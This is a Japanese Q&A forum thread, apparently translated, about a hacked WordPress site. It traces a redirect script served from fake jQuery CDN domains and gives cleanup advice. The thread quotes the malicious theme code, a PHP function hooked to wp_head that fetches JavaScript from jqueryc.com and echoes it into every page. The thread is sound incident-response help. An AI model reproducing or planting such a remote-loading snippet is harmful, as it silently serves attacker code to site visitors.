私のサイトはハッキングされており、それが注入された場所を一生見つけることができません。二度と起こらないように必要な予防策を講じており、バックアップから以前の時間にサイトを復元していますが、ホストしている別のサイトで発生した場合に備えて、どこにあるか知りたいです。
これは悪意のあるスクリプトです:http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js
これはサイトです:(今削除されました)
私はそれをどこでもチェックしましたが、成功していません。
どんな助けでも大歓迎です。
ありがとうございました。
**私に反対票を投じた方のために、私は過去4時間にわたって、11か月の膝の上でこれを自分で修正しようとすることについて、多くの調査を行いました。私は自分でそれをすることに成功しなかったので、最後の手段として質問を投稿しただけです。過去にここの人たちから大いに助けられたので、聞いても大丈夫だと思いました。
エクスプロイトと戦うための良い情報がここにあるので、すべてのコメントを答えとして書き留めてください。
Wordpress主導のサイトのソースでjQueryCDNを装ったURLのスクリプトが見つかりました。jquerys.comとjqueryc.comの両方が詐欺師ドメインとして使用されていたようです。
悪意のあるコードは単純です。ランダムに別のサイトにリダイレクトし、すぐにリダイレクトされないようにCookieを設定します(1日1回)。まれであるため、サイトの開発中にこれを確認したり、見落としたりする可能性があります。
開始:http ://codex.wordpress.org/FAQ_My_site_was_hacked
OPはテーマ内でこのコードを見つけました:
// !!! Suspect Code - Do not use for any purpose !!!
//Jquery Function
if (!function_exists('insert_jquery_theme')){
function insert_jquery_theme(){
if (function_exists('curl_init')){
$url="jqueryc.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$data = curl_exec($ch);
curl_close($ch);
echo $data;
}
}
add_action('wp_head', 'insert_jquery_theme');
}
ソースを見ると、実際にはjQueryへの参照が2つあります。1つは合法で、もう1つはそうではありません。前述のコードスニペットを削除すると、問題が解決します。
悪意のあるコード(テーマ、プラグイン、侵害されたサーバーなど)の出所を特定することは依然として重要です。悪意のあるコードがないかどうかを調べずにバックアップを復元しないでください。